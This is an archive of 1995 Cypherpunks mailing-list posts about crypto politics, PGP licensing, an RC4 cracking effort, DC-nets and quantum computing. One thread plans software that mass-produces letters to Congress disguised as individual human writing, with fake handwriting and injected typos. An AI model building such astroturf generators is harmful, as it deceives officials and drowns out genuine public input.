Bass lab - zinc fingers + dsRNA! ** FINGER ME for my pgp public key ** crypto for the masses! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu From monty.harder at famend.com Tue Jul 18 17:34:21 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Tue, 18 Jul 95 17:34:21 PDT Subject: Root Causes In-Reply-To: <8AD533C.000300016D.uuout@famend.com> Message-ID: <8AD747E.00030001AB.uuout@famend.com> [Disclaimer: IASNAL, but I am the host of the Bill of Rights Conference on the U'NI echonet, where these issues are discussed from time to time.] JR> >violation of the right to privacy? JR> JR> Good idea, but I have an idea to upset even *more* people. [9th and 10th Amendment stuff] Them, too. JR> Republicans AND Democrats ALL HATE the 9th Amendment, which is the primary The reason there was no BOR in the original Constitution was precisely that some folks were afraid that the enumeration of some rights would imply that there are none other. The DOI and other writings of the FFs clearly show that rights are naturally inherent in individual human beans, and that the power of government comes from us, not the other way around. But the FFs also knew that the prevailing view was that rights are what is left over after the government is done flexing its muscles. Bottom line: The Bill of Rights was passed in the Congress as a 12-article gang-bang amendment, and the 10 of them that became the BOR were passed as an organic whole by the several states. [And, of the other two articles, which clearly didn't belong in a BOR, one of them was ratified a few years ago even.] This means that without =any= of the 10 amendments, there would be =no= BOR. JR> slow erosion of freedom in this country. My rejoinder is "OK, if we're JR> supposed to ignore it, why not just REPEAL it, after all, it's just sitting JR> there doing nothing, cluttering up the rest of the Bill of Rights." Usually, Don't give them any ideas! The 2nd is already on that list, and part of the 1st (that refers to "flag desecration", which apparently is more serious than =Constitution= desecration)... don't get me started, I'm way off crypto already. JR> talking about Constitutional issues on encryption rights, if for no other JR> reason than to educate the public. In court, of course, I would concentrate JR> on the 1st. Apologies to the various lurking law professors on the list, I Actually, I would kick in 2 and 4. The government has called crypto a munition, and it =is= a valuable tool for the unorganized militia to fight a guerilla war against an occupation force. The 4th amendment protections against search and seizure are the moon which creates the penumbra of Roe v. Wade.> U'NInet Bill of Rights Conference Host * Physician, heal thyself! --- * Monster at FAmend.Com * From monty.harder at famend.com Tue Jul 18 17:34:26 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Tue, 18 Jul 95 17:34:26 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <8AD6103.0003000176.uuout@famend.com> Message-ID: <8AD747E.00030001AC.uuout@famend.com> PE> Rather than spend five minutes writing something on your own you'd end PE> up something that looks totally fake. I believe that what is going on No, that's "rather than not writing anything at all". I know how to call and write to my congresscritters. The idea of the WWW page is for those who wouldn't take the initiative to do it in the first place. PE> would be discerned by a staffer in moments. Crap like this is called They should know, because they send form letters to constituents all the time, only they don't bother to vary it a bit. PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts. Meanwhile, back at the ranch... If one of our DC members can set up an Imail-FAX gateway, we can publicize some nifty Iddresses for folx to send things in their own words, if possible, and if they don't have any words of their own, they can borrow some. Boilerplate has to be better than nothing. * Is there such a thing as a "gruntled" Postal employee? --- * Monster at FAmend.Com * From zinc at zifi.genetics.utah.edu Tue Jul 18 17:40:51 1995 From: zinc at zifi.genetics.utah.edu (zinc) Date: Tue, 18 Jul 95 17:40:51 PDT Subject: cfs for linux Message-ID: -----BEGIN PGP SIGNED MESSAGE----- cpunks, some time ago i inquired about an encryption program for linux. i eventually obtained cfs from Matt Blaze (thanks...). i haven't dealt with this for some time but i have been unable to compile it. if anyone running linux has it working i'd appreciate hearing from you. here are the errors i get if anyone is interested... zifi:~/projects/cfs> make cc -O -c cfs_adm.c -o cfs_adm.o cfs_adm.c: In function `admproc_null_2': cfs_adm.c:47: number of arguments doesn't match prototype admproto.h:183: prototype declaration cfs_adm.c: In function `admproc_attach_2': cfs_adm.c:54: argument `rp' doesn't match prototype admproto.h:186: prototype declaration cfs_adm.c: In function `admproc_detach_2': cfs_adm.c:155: argument `rp' doesn't match prototype admproto.h:189: prototype declaration make: *** [cfs_adm.o] Error 1 thanks, - -pat patrick finerty = zinc at zifi.genetics.utah.edu = pfinerty at nyx.cs.du.edu U of Utah biochem grad student in the Bass lab - zinc fingers + dsRNA! ** FINGER ME for my pgp public key ** crypto for the masses! zifi runs LINUX 1.2.11 -=-=-=WEB=-=-=-> http://zifi.genetics.utah.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMAxUm03Qo/lG0AH5AQE4DAQAoxA44ESm/7xQ1ke+8yo2VqCemmlrKJkh 2vuJnC4lhayAWEHzKuiqf3G3AAPHHqQdX8JBGNZWt0TAuyoGMWTRI2/U0jTe82AC ew4Y6WzZTEvmdxHaxTFU9R2q6MUOGe4U6Bmdt8tMeU2hy5jDvoijgdiSfBJrU9eS p2Cd2eigAFs= =cQCG -----END PGP SIGNATURE----- From Simon.McAuliffe at Comp.VUW.AC.NZ Tue Jul 18 17:45:53 1995 From: Simon.McAuliffe at Comp.VUW.AC.NZ (Simon McAuliffe) Date: Tue, 18 Jul 95 17:45:53 PDT Subject: RC4 crack In-Reply-To: <199507182047.QAA03926@bb.hks.net> Message-ID: <199507190045.MAA28819@lido.comp.vuw.ac.nz> shamrock at netcom.com (Lucky Green) wrote on Tuesday, 18 Jul 1995: > >As to the problem of not having 24-7 connectivity, you could either > >use the WWW page, or the server (it will do this anyway) will keep > >re-trying to get a socket connect to the master until it suceeds, so > >when you next go on-line ... wham it gets through again as > >connectivity is resumed and says whatever it has been trying to say. > >We need it to retry in case of network out (or horror) big master > >falling over, until it gets resumed. > > On many machines that will mean that it will try to initiate a connection > to the host. Please allow for a manual connect option. While we're suggesting features, how about including something (on the networked version) which performs a quick sanity check on any clients so we know they're not bogus, ie send one or more known plaintext/ciphertext pairs with corresponding keys to verify the correctness of the compilation. From cjl at welchlink.welch.jhu.edu Tue Jul 18 17:54:59 1995 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Tue, 18 Jul 95 17:54:59 PDT Subject: Quantum computing/crypto Message-ID: C-punx, Before the list cratered I had been intending to respond to Doug Hughes post about the quantum computing news piece by James Glanz in SCIENCE magazine, 7th July, vol. 269, pg. 28-29. If you are reading this thread you may be aware of Peter Shor's development of an algorithm that uses quantum logic to factor large numbers. This was discussed on the list last year and the general take on it was that there was no way to build a functioning quantum computer, and even if there were the code-maker would end up ahead of the code breaker. Well, it seems that his work stimulated some further interest in the design and construction of quantum computers and even a conference in Torino, Italy a few weeks ago. In the 15th May Physical Review Letters ther are a number of papers on QC's, including one by Ignacio Cirac & Peter Zoller that describes the construction of a quantum logic gate. This builds on an article in same issue of PRL by Artur Ekert, David Deutsch and Adriano Barenco describing how by trapping ions in an electric field just above zero degrees Kelvin one can build a "quantum wire" which will pass information without measuring it (and therefore collapsing the quantum uncertainty). Chris Monroe and David Wineland at NIST in Boulder have already built a simplified version of this quantum logic gate device, and have written a proposal to factor the number 15 using the technique. The hardware involved will be about 10 mercury atoms. There is airtime at the end of the piece for skeptics citing the calculations showing that "small errors in a QC can accumulate exponentially and no one has figured out a satisfactory way of reaching into the quantum world to correct them". As I mentioned before there is a sidebar talking about the successful demonstration of quantum cryptography over 14 kilometeres of fiber optic cable in Los Alamos by Richard Hughes and colleagues, apparently announced at a conference held last month at the Univ. of Rochester in New York. Alice and Bob can swap bits encoded in the quantum properties of photons that can't be intercepted with out them knowing that something is amiss. C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From adam at bwh.harvard.edu Tue Jul 18 17:55:20 1995 From: adam at bwh.harvard.edu (Adam Shostack) Date: Tue, 18 Jul 95 17:55:20 PDT Subject: We appear... In-Reply-To: <9507182318.AA08206@webster.imsi.com> Message-ID: <199507190055.UAA01226@bwh.harvard.edu> | We appear to have an nntp/mail loop in progress. I believe the problem | is at mnemosyne.cs.du.edu -- its posting cypherpunks back to the | mailing list (ugh!). This very simple procmailrc rule means that you never notice such ugliness. :0 Wh: msgid.lock | formail -D 65536 .msgid.cache procmail: ftp://ftp.informatik.rwth-aachen.de/pub/packages/procmail/procmail.tar.gz Adam From jgrubs at voxbox.norden1.com Tue Jul 18 18:03:11 1995 From: jgrubs at voxbox.norden1.com (Jim Grubs, W8GRT) Date: Tue, 18 Jul 95 18:03:11 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <5gog9c2w165w@voxbox.norden1.com> -----BEGIN PGP SIGNED MESSAGE----- Jim Gillogly writes: > > > Rick Busdiecker writes: > > From: "Jim Grubs, W8GRT" > > > In practice, I'd probably buy Viacrypt for legal reasons but use > > PGP anyway. > > >I'd be interesting in hearing some of the lawyers out there comment on > >this. > > Does RSADSI count as having lawyers? So far as I know they have not > commented in public about whether the ViaCrypt license is valid, but > they have also not (to my knowledge) contested it. However, Jim Bidzos > has explicitly said that it is not acceptable to buy a ViaCrypt license > to cover your use of non-ViaCrypt PGP. Hmm, does that make anyone besides me wonder about that unpulished source code? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: http://norden1.com/~jim/sylvania.html iQCVAwUBMAxYot74r4kaz3mVAQESFwP/cws/p52apS7V7xMZ/7jHmarUKLSpxOox nOk8sirst2p9vQqzvR88lwzmGecLb1/lc/mWKzAV1DT4dMAzyljV7d9UIiW0wTvk i5I4o7IQ9ogppdzEt7XdG0rlQCAHHsUYYa1oVufz4OtOd0cHi2SRXje7XSTrxQYF 0FbSsqZsxuw= =YrUs -----END PGP SIGNATURE----- -- WebCasters(tm) James C. Grubs jgrubs at voxbox.norden1.com 6817 Maplewood Avenue Tel.: 419-882-2697 Sylvania, Oh 43560 Fax: 419-885-2814 Internet consulting, HTML programing, Information brokering From pgf at tyrell.net Tue Jul 18 18:20:36 1995 From: pgf at tyrell.net (Phil Fraering) Date: Tue, 18 Jul 95 18:20:36 PDT Subject: Here it is; bi-directional dining cryptographers In-Reply-To: <199507170827.BAA12420@ix6.ix.netcom.com> Message-ID: <199507171153.AA11135@tyrell.net> Bill, I'll probably go down to the notary's this morning to get the thing registered; I don't want to pay $ 50.00 to surety for what's likely to be a one-shot deal. And I've been leaning towards the side of releasing it into the public domain anyway, so here goes: (And besides, I can't believe everyone else missed this; one of you has got to know about this already): If Alice and Bob are members of a reasonably non-compromised and free of colluders dining-cryptographers network, with a protocol for reserving blocks for the transmission of data packets, then if they both send a data packet in the same block, they can each read what the other is saying but to the rest of the DC-net it is garbled. Since what is broadcast is the XOR of Alice's and Bob's data, Alice can read Bob's data by XOR'ing the output of the DC-net with her attempted input; Bob can recover her data the same way. Comments? (At the very least, it doubles the bandwidth for the two participants...) Phil From sdw at lig.net Tue Jul 18 18:31:44 1995 From: sdw at lig.net (Stephen D. Williams) Date: Tue, 18 Jul 95 18:31:44 PDT Subject: Free The World Web Server project.. :) In-Reply-To: <8AD747E.00030001AC.uuout@famend.com> Message-ID: > > PE> Rather than spend five minutes writing something on your own you'd end > PE> up something that looks totally fake. I believe that what is going on > > No, that's "rather than not writing anything at all". I know how to > call and write to my congresscritters. The idea of the WWW page is for > those who wouldn't take the initiative to do it in the first place. > > PE> would be discerned by a staffer in moments. Crap like this is called > > They should know, because they send form letters to constituents all > the time, only they don't bother to vary it a bit. > > PE> "astroturf" by staffers, to distinguish it from "grass roots" efforts. > > Meanwhile, back at the ranch... If one of our DC members can set up an > Imail-FAX gateway, we can publicize some nifty Iddresses for folx to > send things in their own words, if possible, and if they don't have any > words of their own, they can borrow some. Boilerplate has to be better > than nothing. I hereby offer to setup an Email-FAX gateway for the DC/N. VA area if there is enough interest and some way can be found to defray an Internet feed, phone line, etc. Unfortunately I live just over the line where a local line to DC costs $.50/mo.... At my house it costs $100/mo. However, I have a number of friends (and could probably find others) that a PC with Linux and two phone lines/modems could be placed at to handle this. I might even have a junk PC that could handle it. Anyone who spends much on DC faxes now could save a bundle... I'm familiar with setting up the tpc.int software, so it should integrate well. I'm way too busy and overloaded to both pay for and completely set this up however. > * Is there such a thing as a "gruntled" Postal employee? > --- > * Monster at FAmend.Com * > sdw -- Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw at lig.net http://www.lig.net/sdw Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011 OO/Unix/Comm/NN ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95 From ANDREWR at real3.realtime.co.za Tue Jul 18 18:39:57 1995 From: ANDREWR at real3.realtime.co.za (Andrew Roos) Date: Tue, 18 Jul 95 18:39:57 PDT Subject: Here it is; bi-directional dining cryptographers Message-ID: Phil Fraering observes: > If Alice and Bob are members of a reasonably non-compromised and > free of colluders dining-cryptographers network, with a protocol for > reserving blocks for the transmission of data packets, then if they > both send a data packet in the same block, they can each read what > the other is saying but to the rest of the DC-net it is garbled. > > Since what is broadcast is the XOR of Alice's and Bob's data, Alice can > read Bob's data by XOR'ing the output of the DC-net with her attempted > input; Bob can recover her data the same way. > > Comments? I haven't been following the DC thread so forgive me if I've missed something... If the objective is to keep what Alice and Bob say SECRET then we have a problem if the entropy per bit of Alice's data plus the entropy per bit of Bob's data is less than one bit, because then there is only one likely decryption of the "ciphertext", which will reveal what both Alice and Bob are saying. The system is analegous to a variation on the old Vigenere/Beaufort cipher where instead of using a single repeated keyword to generate to encryption stream, you use another "plaintext" message such as a passage from a book which is known to both correspondents. (Here the addition is done mod 26 instead of mod 2). Since the entropy of natural language is 1-1.5 bits/char, the entropy of two natural language texts added together is 2-3 bits per char, while the no of ciphertext bits is about 5 bits per char, so there remains 2-3 bits per char of redundancy in the text, which can (quite easily) be used to break the system even on a ciphertext-only basis. One way to do this is to search for "probable words" of one side of the conversation, then see what the other text would have to have been to generate the known ciphertext, and if this other text makes sense then bingo, we have an initial break, and you can usually extend this quite easily by extending one text, then seing what this gives for the other, extending that, and so on. > (At the very least, it doubles the bandwidth for the two participants...) I have to agree here, though! Andrew ___________________________________________________________________________ #!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL ($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2% Sa2/d0 On Mon, 17 Jul 1995, Andrew Roos wrote: > If the objective is to keep what Alice and Bob say SECRET then we > have a problem if the entropy per bit of Alice's data plus the > entropy per bit of Bob's data is less than one bit, because then > there is only one likely decryption of the "ciphertext", which will > reveal what both Alice and Bob are saying. Yes, but presumably it's expected that they would be using secure encryption on the messages that they're sending. That might still provide some information about the message for traffic analysis, e.g. if you send a PGP message you have your key-id at the beginning, and if you knew the keys of all members of the DC-net you could XOR them and see who's talking to who. I'd have thought the most significant problem would be reserving the blocks in an anonymous fashion while not allowing denial-of-service attacks. Mark From hoz at univel.telescan.com Tue Jul 18 18:56:48 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Tue, 18 Jul 95 18:56:48 PDT Subject: Mandatory key registration Message-ID: <9507190156.AA00268@toad.com> In the event of legally required key registration, I would like to continue to use PGP. My private RSA key is my own business, so I would like to comply with the requirements by registering my IDEA keys instead. There are approximately 2**128 of them, and I'm not quite sure which one will be used next, so can I just register ALL of them? Can I do this on-line? If all the cypherpunks use the same key set, must we each register all of them, or will a single list do? Rick F. Hoselton (who doesn't claim to present opinions for others) From hayden at krypton.mankato.msus.edu Tue Jul 18 19:06:11 1995 From: hayden at krypton.mankato.msus.edu (Robert A. Hayden) Date: Tue, 18 Jul 95 19:06:11 PDT Subject: We appear... In-Reply-To: <199507190006.UAA17547@thor.cs.umass.edu> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Tue, 18 Jul 1995, L. McCarthy wrote: > Duplicates of some of Bob Hayden's articles have been appearing via NNTP > from krypton.mankato.msu.edu lately, too. I've been posting those duplicate articles to alt.security.pgp at the same time (using pine as a mailer/news poster), so I'm assuming that somebody's news server is getting the message and passing it to the mail address. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: PGP Signed with PineSign 2.1 iQCVAwUBMAxoqzokqlyVGmCFAQGGOgP/S5ooqSSc0mb238KX0nelloblqyqmvFNc vsNq+wqHN58KYdoQC+B/cO4Vhj9CRBfe+RFA3oiStqNf397MgTuUjbSl58OZ8zLI zXQdSPkBbLZ4Lemz1uxDadLt/1qTR9ohT51pMiJEOnd2a388WpoSCdnrPuEmARH7 y2ASm/44978= =kI+e -----END PGP SIGNATURE----- ____ Robert A. Hayden <=> Cthulhu Matata \ /__ -=-=-=-=- <=> -=-=-=-=- \/ / Finger for Geek Code Info <=> hayden at krypton.mankato.msus.edu \/ Finger for PGP Public Key <=> http://att2.cs.mankato.msus.edu/~hayden From tcmay at sensemedia.net Tue Jul 18 19:21:18 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Tue, 18 Jul 95 19:21:18 PDT Subject: Mandatory key registration Message-ID: At 1:56 AM 7/19/95, rick hoselton wrote: >In the event of legally required key registration, >I would like to continue to use PGP. My private RSA >key is my own business, so I would like to comply >with the requirements by registering my IDEA keys >instead. There are approximately 2**128 of them, and >I'm not quite sure which one will be used next, so >can I just register ALL of them? Can I do this on-line? >If all the cypherpunks use the same key set, must we each >register all of them, or will a single list do? It seems likely to me that an actual GAK system will require some fee per key. For example, one might have to send in a form, maybe a diskette, and a $25 per key fee for "handling costs." This is the way automobile registrations are handled (and they have become a "revenue source"..I pay $450 per year to register my truck!!!). This makes trying to register 2^128 keys rather expensive. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From S0496872 at DOMINIC.BARRY.EDU Tue Jul 18 20:02:58 1995 From: S0496872 at DOMINIC.BARRY.EDU (ENRIQUE S. IGNARRA) Date: Tue, 18 Jul 95 20:02:58 PDT Subject: Wiping swapfile Message-ID: <01HT16RSDX3Q000QZQ@DOMINIC.BARRY.EDU> Could someone email me or post to the list where i could get utilities to wipe my windows swapfile so my PGP pass phrase is not stored in it. I know such utilities exist, but i don't know where to find them. Any help would be greatly appreciated! Thanks! Enrique s0496872 at dominic.barry.edu From klbarrus at infocom.net Tue Jul 18 20:57:34 1995 From: klbarrus at infocom.net (Karl L. Barrus) Date: Tue, 18 Jul 95 20:57:34 PDT Subject: SurfWatch for employees (ugh) Message-ID: <199507190359.WAA08094@infocom.net> >Webster Network Strategies has announced (but apparently has not >shipped) a product similar to SurfWatch but aimed at an employment >environment. The product is called "WebTrack" and supposedly supports >access lists of URLs, where access can be allowed to "all but these sites" >or "only to these sites". The product also can be configured to log all >Web usage by users subjected to its reign of terror. :) Well, I know there are already products like this out there, because the company I work for uses one. I was helping my boss/project lead figure out why he couldn't establish an account on the penet anonymous server, and in the process of phone calls to various people, we discovered that the anonymous server at penet is blocked from our site, and also that every web connection is logged. Actually, I have no problem with this, even if they restrict usenet feed to the comp heirarchy, restrict web activity to a list of approved sites, log all they want to, etc. That's why I got a seperate account. -- Karl L. Barrus From wd803 at freenet.victoria.bc.ca Tue Jul 18 21:25:53 1995 From: wd803 at freenet.victoria.bc.ca (Jonathon Blake) Date: Tue, 18 Jul 95 21:25:53 PDT Subject: Automatic Rant generator Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Date: Mon Jul 17, 1995 5:22 pm GMT From: Timothy C. May Subject: Automated Rant Generators and Letter Generators At 7:35 AM 7/17/95, Martin Hamilton wrote: >MONTY HARDER writes: > >| Anyone who has read MAD Magazine could put such together. As an added >| bonus, use variable margin settings, and none of the letters would be >| exactly the same. Appropriate Imail => FAX software on a puter in DC >| (local call that way) with the phone number of the sender filled in on >| the top line for ID (izzat legal?) so it doesn't look like a form letter >| at all. > >Plus - choose the fonts & point sizes at random too ? :-) Tim May > Cypherpunks could probably have an effect on Tim May > hastening this "denial of service" attack on the Tim May > efficacy of letter-writing by releasing an easy-to- Tim May > use package that does all this letter writing at Tim May > the click of a button....just type in some key Tim May > words, for the topics, and it does the rest. Tim May > An interesting project, actually. Actually, your little project could cause some major problems in a area you may not anticipate --- personnel selection. Specifically, the use of Handwriting Analysis as a tool for personnel profiling. Date: Mon Jul 17, 1995 11:48 pm GMT From: Harry Bartholomew Subject: Re: Automated Rant Generators and Letter Generators Harry > A final step might be to interface the output to old Harry > pen plotters like my HP7470A with an ascii-to- Harry > handwriting program. Akin to the White House Harry > souvenir signature generator, but with a set of Harry > parameters to mimic different "hands". Knuth's Harry > Metafont tricks come to mind. Making the little problem Tim presents, a major headache for somebody else --- handwriting analysts. Date: Tue Jul 18, 1995 1:18 am GMT From: Timothy C. May Subject: Re: Automated Rant Generators and Letter Generators Tim May > Bart's comments about using Knuth's typographic Tim May > work are interesting, to the extent that letters Tim May > need to look handwritten. In the Mac market, it's Tim May > possible to send in some handwriting samples and Tim May > get back a font that emulates the handwriting! Actually, True Type fonts of your handwriting are available, for any platform that accepts that font type. I don't have the URL for them, but there is a pointer to it at HTTP://www.ntu.ac.sg/~tjlow/gclub.html Tim May > I don't think the pen plotter is actually needed- Tim May > - and few people would use it--as most fax can Using it would play hell for handwriting analysts, though. And if it was programmed to change the pen pressure as well --- the possibilities are staggering. Can a pen plotter change pressure? Tim May > be emulated with laser printers (due of course to Tim May > the limited dots per inch resolution). In fact, Tim May > most fax modems can directly fax from any screen Tim May > that can produce printed output. So, the Tim May > combination of handwriting fonts, automated rant Tim May > generators (of varying rabidities), and fax Tim May > capabilities gives a pretty good start. Using lots Tim May > of handwriting samples, various other fonts, and a Tim May > mix of styles in the letters will help. Tim May > Anyway, where this all gets interesting is the Tim May > following: * Can a kind of Turing Test be tried Tim May > here? But of course. Tim May > That is, in this limited domain of "letters to the Tim May > editor/Congressmen," can a letter generator be Tim May > implemented which generates letters effectively Tim May > indistinguishable from letters and fax generated Tim May > by actual human beings? ("Effectively Tim May > indistinguishable" in the sense that a human reader Tim May > could not sort a set of letters into human- and Tim May > machine-generated subsets with statistically Tim May > significant certainty better than guessing). I don't remember the title, but at least one french novel was rumored to have been entirely generated by computer. Tim May > Of course this is also similar to the "style Tim May > detectors" we so often talk about. I don't remember the program name, but there is software available now, that analyzes a document, and figures out who wrote it --- based on the frequency count of the letters of the alphabet. Secondary measures are frequency counts of letter pairs. Words, phrases, sentences etc are totally ignored. So what you'd need to do here, to pass your pseudo- Turing Test is a program that generates different statistical results, for allegedly different people. Tim May > The crypto relevance has to do with detecting Tim May > patterns in letters and rants, in emulating these Tim May > patterns, and (perhaps) in speeding up lobbying. Tim May > (Though I agree that widespread adoption of Tim May > automated letter-writing, such as the direct mail Tim May > folks are already doing, will eventually just kill Tim May > off letter writing as a means of lobbying.) Tim May > This may also hasten the adoption, someday, of Tim May > digital signatures. Congressmen and their aides Tim May > may check incoming letters against databases of Tim May > their constituents who have "registered" with them Tim May > (lots of issues here). Or might just subject all mail to various automations, which accept/reject mail, based on what it looks for. << If it passes the congress person's Turing Test, it is read, as being authentic --- although I doubt half the people in the capital could actually pass a Turing Test to begin with. >> Tim May > Merely counting the "yes" and "no" letters has long Tim May > been problematic, as the Republicans have been Tim May > leading in direct mail campaigns since at least the Tim May > mid-70s (recall Richard Viguerie...). Increased Tim May > automation will just make it even more obvious. Date: Tue Jul 18, 1995 5:23 pm GMT From: Timothy C. May Subject: Re: Automated Rant Generators and Letter Generators Tim May > David Conrad told me he meant for this to go to the Tim May > whole list, but only sent it to me by mistake. So Tim May > here is his post. At 4:14 PM 7/18/95, David R. Conrad wrote: >Tim May writes: >>Bart's comments about using Knuth's typographic work are interesting, to >>the extent that letters need to look handwritten. In the Mac market, it's >>possible to send in some handwriting samples and get back a font that >>emulates the handwriting! > >I suppose the resulting font has only one form for each letter? (Although >I understand that when you send them a sample, you send several instances >of each letter; a friend was showing me an add for this.) The fact that >each letter is the same every time would be a giveaway. We need something >like Metafont, or at least choose from a number of different shapes. > >> ... So, the combination of >>handwriting fonts, automated rant generators (of varying rabidities), and >>fax capabilities gives a pretty good start. Using lots of handwriting >>samples, various other fonts, and a mix of styles in the letters will help. > >Another factor that would make it appear more authentic would be spelling >and grammar errors. The grammar errors could be built into the rant >generators (an occasional dangling modifier, an incomplete sentence or two); >spelling errors could be done by post-processing the output of the rantgens. >It's important to take into account the different types of spellos that >occur: commonly misspelled words (aquired, beleive); wrong homophone (their, >they're, there; two, to, too); transposed letters (transpoesd); near-misses >on qwerty keyboards (nesr-mosses); and words left out. > >-- >David R. Conrad, ab411 at detroit.freenet.org, http://web.grfn.org/~conrad/ >Finger conrad at grfn.org for PGP 2.6 public key; it's also on my home page >Key fingerprint = 33 12 BC 77 48 81 99 A5 D8 9C 43 16 3C 37 0B 50 >No, his mind is not for rent to any god or government. Actually, the usual give away, is in letter and letter pair frequencies --- not spelling mistakes, grammatical errors, etc. However, there a technique called _Scientific Content ANalysis_ that looks at how things are said, to judge their "truthfulness." A good program will not show that the text was randomly generated, nor show that the author is off-the- wall, so to speak. You may have bitten off a bit more than you can chew here. OTOH, a group that tries to crack keys, knowing that the possibility of success is slim to non-existent, can probably pull this one off --- if only because the possibility of success is pretty good. Er, how did the cracking of the key go? Last I read 60+%, and no hints of it being broken. << I almost want to participate, but with a dx25, running NovellDos, I'm not sure what that platform could do. << I''ll graduate to Linux, after I buy some more memory, and a new hard drive for that sytem. >> >> xan jonathon -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCzAwUBMAyFtaVRQvz57IB1AQF25wTvQD+eQVxvKOwin+Izb4d5c0u7i6JWWSZR BoY9T3b7BEhiU6EfKgP4BZabi8gHTM742ROCXAvCZQusWAxLfXSOKwjmUs5ieaD7 f6cEB8/D+EZu395qa0bCu28/hLmKslQvXvsWoMpxcHzhjEHJhYs/0BQxHZoZMsrM PrfFLqrhdJzhPYn5iy83nhBB54GlKnCIBgfEqaZnHjjC2hzZJJo= =GyP/ -----END PGP SIGNATURE----- From hoz at univel.telescan.com Tue Jul 18 22:03:37 1995 From: hoz at univel.telescan.com (rick hoselton) Date: Tue, 18 Jul 95 22:03:37 PDT Subject: Govt mandated key Message-ID: <9507190503.AA05987@toad.com> If I have to pay for each key that I use, then I have a particular key in mind for my one time pad. It's a single (trancendental) number that starts with a decimal point. It's the binary equivalent of the decimal number: .012345678910111213141516171819202122...... I promise to only use this one key, and I'll just select a random offset into it for each message. Rick F. Hoselton (who doesn't claim to present opinions for others) From ericande at linknet.kitsap.lib.wa.us Tue Jul 18 22:28:17 1995 From: ericande at linknet.kitsap.lib.wa.us (Eric Anderson) Date: Tue, 18 Jul 95 22:28:17 PDT Subject: Govt mandated key In-Reply-To: <9507190503.AA05987@toad.com> Message-ID: On Tue, 18 Jul 1995, rick hoselton wrote: > If I have to pay for each key that I use, then > I have a particular key in mind for my one time > pad. It's a single (trancendental) number that > starts with a decimal point. It's the binary > equivalent of the decimal number: > > .012345678910111213141516171819202122...... > > I promise to only use this one key, and I'll just > select a random offset into it for each message. > > Rick F. Hoselton (who doesn't claim to present opinions for others) > > I wouldn't register my keys and I don't think ANY of us should either. If they threatened me W/ RICO, I would probably register *A* key but certainly not one I EVER indended to actually use. In a case like this I think massive civil disobediance would be a good response. I would like to see a campaign of sending PGP to random Euros or whoever has a foriegn tag through anon. remailers.Like this UU encode it and daisy chain it to whoever. How's that sound? Eric From dougr at skypoint-gw.globelle.com Tue Jul 18 23:29:33 1995 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Tue, 18 Jul 95 23:29:33 PDT Subject: Stego-Rants ? Message-ID: Just a few thoughts: 1. Use the randomness in a computer generated piece of English text to hold your real message, encrypted, and obscured. 2. Even more entertaining would be if the foreground text could somehow be contrived to be meaningful. I know this would be a "good trick" but I'd conjecture that it's possible. Imagine fractal compression of a text file, with the decompression routine adding some "randomness" which would be your message, obscured at a very abstract level. Depending on how much "randomness" was added, I'm wondering if the resulting text might possibly retain some of its original legibility (?) I am assuming that a companion fractal re-compressing routine would be required to retrieve the cypher. (I am looking at an ad for a graphics program, "Images Incorporated" by Iterated Systems which with fractal techniques can achieve 100:1 compression -- and then -- decompress to 8 times the original bitmap size with minimal added distortion.) Doug From tj at compassnet.com Wed Jul 19 00:27:00 1995 From: tj at compassnet.com (Bolivar Shagnasty) Date: Wed, 19 Jul 95 00:27:00 PDT Subject: Automatic Rant generator Message-ID: Tim May wrote: >That is, in this limited domain of "letters to the editor/ >Congressmen," can a letter generator be implemented which >generates letters effectively indistinguishable from letters >and fax generated by actual human beings? ("Effectively >indistinguishable" in the sense that a human reader could >not sort a set of letters into human- and machine-generated >subsets with statistically significant certainty better than >guessing). >Bart's comments about using Knuth's typographic work are interesting, to >the extent that letters need to look handwritten. In the Mac market, it's >possible to send in some handwriting samples and get back a font that >emulates the handwriting! Reading this thread it suddenly became clear: -The appearance of a letter being handwritten is a temporary factor at best. Within a very few years (2-3 I would guess) the growth in the use of email and the volume of communications to be sorted into For and Against piles will cause a sudden and dramatic shift in Congress to a strong preference for incoming email. Within 10 years they may refuse paper mail. Any month now someone in Congress will tip to the fact that email can be processed by programs that can identify the issue and the pro or con position of the writer. Constituents will be encouraged to write, but only in the form of email, and to state their position clearly and concisely, i.e. in a form suitable for successful parsing, analysis, and classification. -Political letter renderers will become common on the Web before Nov. 1996. There are already renderers of graphic images on the Web. There would be more if it were easy to pay with a 25-cent token, and it *will* be widespread and easy to do that, very very soon. Political letter renderers don't have to wait for mass participation in online payment mechanisms -- they have ready-made sponsors. Unlike the occasional effort to sponsor phone calls by making an 800 number available, sponsors of letter rendering services can be sure those services won't be seriously misused: The 2nd Amendment CongressLetter WebPage will *only* render letters *against* H-1234 or *for* S-2345, for 